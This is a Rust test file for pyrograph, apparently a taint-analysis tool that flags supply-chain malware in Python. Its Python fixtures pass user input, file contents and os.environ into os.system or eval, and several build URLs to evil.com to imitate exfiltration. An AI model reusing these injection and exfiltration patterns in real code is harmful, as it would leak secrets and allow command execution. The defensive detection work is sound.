// pyrograph 0.1.0
//
// GPU-accelerated taint analysis for supply chain malware detection.
// Documentation
#![cfg(feature = "python")]

use pyrograph::{analyze, parse::parse_python};

/// Parses `source` as the Python file `{name}.py`, runs `analyze` on the
/// resulting graph and panics unless at least one finding is reported.
///
/// Also panics (via `unwrap`) if parsing or analysis returns an error.
fn assert_detects(name: &str, source: &str) {
    let file_name = format!("{name}.py");
    let graph = parse_python(source, &file_name).unwrap();
    let findings = analyze(&graph).unwrap();

    let has_findings = !findings.is_empty();
    assert!(has_findings, "expected finding for {name}: {findings:?}");
}

/// Parses `source` as the Python file `{name}.py`, runs `analyze` on the
/// resulting graph and panics if any finding is reported.
///
/// Also panics (via `unwrap`) if parsing or analysis returns an error.
fn assert_clean(name: &str, source: &str) {
    let file_name = format!("{name}.py");
    let graph = parse_python(source, &file_name).unwrap();
    let findings = analyze(&graph).unwrap();

    let is_clean = findings.is_empty();
    assert!(is_clean, "unexpected finding for {name}: {findings:?}");
}

// 1. import statements (aliased module, attribute access)
/// Expects a finding when `input()` is passed to `system` reached through a
/// module alias (`import os as o`).
#[test]
fn tp_import_alias_system() {
    let source = concat!(
        "import os as o\n",
        "cmd = input()\n",
        "o.system(cmd)\n",
    );
    assert_detects("tp_import_alias_system", source);
}

// 2. from X import Y (aliased function)
/// Expects a finding when `input()` is passed to `os.system` imported under
/// a function alias (`from os import system as s`).
#[test]
fn tp_from_import_alias_system() {
    let source = concat!(
        "from os import system as s\n",
        "cmd = input()\n",
        "s(cmd)\n",
    );
    assert_detects("tp_from_import_alias_system", source);
}

// 3. with open(path) as f: data = f.read() (context manager taint flow)
/// Expects a finding when data read inside a `with open(...) as f:` block is
/// interpolated into an f-string that is passed to `os.system`.
#[test]
fn tp_with_open_fstring_system() {
    let source = concat!(
        "import os\n",
        "with open('x') as f:\n",
        "    data = f.read()\n",
        "cmd = f'echo {data}'\n",
        "os.system(cmd)\n",
    );
    assert_detects("tp_with_open_fstring_system", source);
}

// 4. List comprehensions [x for x in data]
/// Expects a finding when `input()` passes through a list comprehension and
/// an element of the resulting list is handed to `os.system`.
#[test]
fn tp_list_comp_system() {
    let source = concat!(
        "import os\n",
        "data = input()\n",
        "items = [x for x in data]\n",
        "os.system(items[0])\n",
    );
    assert_detects("tp_list_comp_system", source);
}

// 5. f-string interpolation f'{secret}' → taint flows through
/// Expects a finding when `input()` is interpolated into an f-string that is
/// passed to `os.system`.
#[test]
fn tp_fstring_system() {
    let source = concat!(
        "import os\n",
        "secret = input()\n",
        "cmd = f'echo {secret}'\n",
        "os.system(cmd)\n",
    );
    assert_detects("tp_fstring_system", source);
}

/// Expects no finding when the `input()` value goes through `int(...)`
/// before being interpolated into the command passed to `os.system`.
#[test]
fn fp_fstring_sanitized() {
    let source = concat!(
        "import os\n",
        "secret = input()\n",
        "safe = int(secret)\n",
        "cmd = f'echo {safe}'\n",
        "os.system(cmd)\n",
    );
    assert_clean("fp_fstring_sanitized", source);
}

// 6. **kwargs unpacking with interprocedural keyword flow
/// Expects a finding when `input()` is passed as a keyword argument (next to
/// a `**kwargs` unpacking) to a function whose body calls `os.system` on it.
#[test]
fn tp_kwargs_interprocedural() {
    let source = concat!(
        "import os\n",
        "def run(*, cmd):\n",
        "    os.system(cmd)\n",
        "payload = input()\n",
        "kwargs = {'shell': True}\n",
        "run(cmd=payload, **kwargs)\n",
    );
    assert_detects("tp_kwargs_interprocedural", source);
}

// 7. Decorator pattern @app.route (tainted decorator arg to sink decorator)
/// Expects a finding when `request.form['code']` is passed to `eval` inside
/// a decorator expression.
#[test]
fn tp_decorator_sink() {
    let source = concat!(
        "from flask import request\n",
        "@eval(request.form['code'])\n",
        "def handler(): pass\n",
    );
    assert_detects("tp_decorator_sink", source);
}

/// Same as `tp_decorator_sink`, but with the `eval` decorator stacked
/// underneath an `@app.route('/')` decorator.
#[test]
fn tp_nested_decorator_sink() {
    let source = concat!(
        "from flask import request\n",
        "@app.route('/')\n",
        "@eval(request.form['code'])\n",
        "def handler(): pass\n",
    );
    assert_detects("tp_nested_decorator_sink", source);
}

// 8. try/except blocks (exception handling taint flow)
/// Expects a finding when both the `input()` call and the `os.system` call
/// sit inside a bare `except:` handler.
#[test]
fn tp_try_except_input_system() {
    let source = concat!(
        "import os\n",
        "try:\n",
        "    pass\n",
        "except:\n",
        "    cmd = input()\n",
        "    os.system(cmd)\n",
    );
    assert_detects("tp_try_except_input_system", source);
}

/// Expects a finding when `input()` is raised in the `try` body and the
/// exception bound by `except Exception as e` is passed to `eval`.
#[test]
fn tp_try_except_raise_flow() {
    let source = concat!(
        "try:\n",
        "    raise input()\n",
        "except Exception as e:\n",
        "    eval(e)\n",
    );
    assert_detects("tp_try_except_raise_flow", source);
}

/// Diagnostic dump for a `'...'.format(secret)` command passed to
/// `os.system`.
///
/// Makes no assertion about the findings: it only fails if parsing or
/// analysis returns an error. Prints the finding count, every graph node and
/// the outgoing edges of node `0` to stderr.
#[test]
fn debug_format_taint() {
    let python_src = concat!(
        "\n",
        "import os\n",
        "secret = input()\n",
        "cmd = 'https://evil.com/{}'.format(secret)\n",
        "os.system(cmd)\n",
    );
    let graph = parse_python(python_src, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();

    let total = findings.len();
    eprintln!("findings count: {total}");

    for node in graph.nodes() {
        eprintln!("  {} {:?} {:?} {:?}", node.id, node.kind, node.name, node.label);
    }

    // Only the edges leaving node 0 are dumped here.
    for (target, edge_kind) in graph.edges_from(0) {
        eprintln!("  edge from 0 -> {target} {edge_kind:?}");
    }
}

/// Diagnostic dump for a `'...'.format(secret)` command passed to
/// `os.system`.
///
/// Makes no assertion about the findings: it only fails if parsing or
/// analysis returns an error. Prints the finding count, each finding and
/// every edge of the graph to stderr.
#[test]
fn debug_format_taint2() {
    let python_src = concat!(
        "\n",
        "import os\n",
        "secret = input()\n",
        "cmd = 'https://evil.com/{}'.format(secret)\n",
        "os.system(cmd)\n",
    );
    let graph = parse_python(python_src, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();

    let total = findings.len();
    eprintln!("findings count: {total}");

    for finding in &findings {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }

    for node in graph.nodes() {
        for (target, edge_kind) in graph.edges_from(node.id) {
            eprintln!("edge: {} -> {target} {edge_kind:?}", node.id);
        }
    }
}

/// Diagnostic dump for an f-string built from `input()` and passed to
/// `eval`.
///
/// Makes no assertion about the findings: it only fails if parsing or
/// analysis returns an error. Prints the finding count, each finding and
/// every edge of the graph to stderr.
#[test]
fn debug_fstring_taint2() {
    let python_src = concat!(
        "\n",
        "secret = input()\n",
        "cmd = f'https://evil.com/{secret}'\n",
        "eval(cmd)\n",
    );
    let graph = parse_python(python_src, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();

    let total = findings.len();
    eprintln!("fstring findings count: {total}");

    for finding in &findings {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }

    for node in graph.nodes() {
        for (target, edge_kind) in graph.edges_from(node.id) {
            eprintln!("edge: {} -> {target} {edge_kind:?}", node.id);
        }
    }
}

/// Diagnostic dump for a `'...'.format(**locals())` command passed to
/// `os.system`.
///
/// Makes no assertion about the findings: it only fails if parsing or
/// analysis returns an error. Prints the finding count, each finding, and
/// every node followed by its outgoing edges to stderr.
#[test]
fn debug_format_locals() {
    let python_src = concat!(
        "\n",
        "import os\n",
        "secret = input()\n",
        "cmd = 'https://evil.com/{}'.format(**locals())\n",
        "os.system(cmd)\n",
    );
    let graph = parse_python(python_src, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();

    let total = findings.len();
    eprintln!("format(**locals) findings count: {total}");

    for finding in &findings {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }

    for node in graph.nodes() {
        eprintln!("  {} {:?} {:?}", node.id, node.kind, node.name);
        for (target, edge_kind) in graph.edges_from(node.id) {
            eprintln!("    edge -> {target} {edge_kind:?}");
        }
    }
}

/// Diagnostic dump for an f-string that interpolates an object attribute
/// (`obj.secret`) assigned from `input()` and is passed to `os.system`.
///
/// Makes no assertion about the findings: it only fails if parsing or
/// analysis returns an error. Prints the finding count and each finding to
/// stderr.
#[test]
fn debug_fstring_complex() {
    let python_src = concat!(
        "\n",
        "import os\n",
        "obj = type('X', (), {})()\n",
        "obj.secret = input()\n",
        "cmd = f'https://evil.com/{obj.secret}'\n",
        "os.system(cmd)\n",
    );
    let graph = parse_python(python_src, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();

    let total = findings.len();
    eprintln!("fstring complex findings count: {total}");

    for finding in &findings {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }
}

/// Diagnostic dump for a `'...'.format(**os.environ)` command passed to
/// `os.system`.
///
/// Makes no assertion about the findings: it only fails if parsing or
/// analysis returns an error. Prints the finding count, each finding, and
/// every node followed by its outgoing edges to stderr.
#[test]
fn debug_format_os_environ() {
    let python_src = concat!(
        "\n",
        "import os\n",
        "cmd = 'https://evil.com/{}'.format(**os.environ)\n",
        "os.system(cmd)\n",
    );
    let graph = parse_python(python_src, "test.py").unwrap();
    let findings = analyze(&graph).unwrap();

    let total = findings.len();
    eprintln!("format(**os.environ) findings count: {total}");

    for finding in &findings {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }

    for node in graph.nodes() {
        eprintln!("  {} {:?} {:?}", node.id, node.kind, node.name);
        for (target, edge_kind) in graph.edges_from(node.id) {
            eprintln!("    edge -> {target} {edge_kind:?}");
        }
    }
}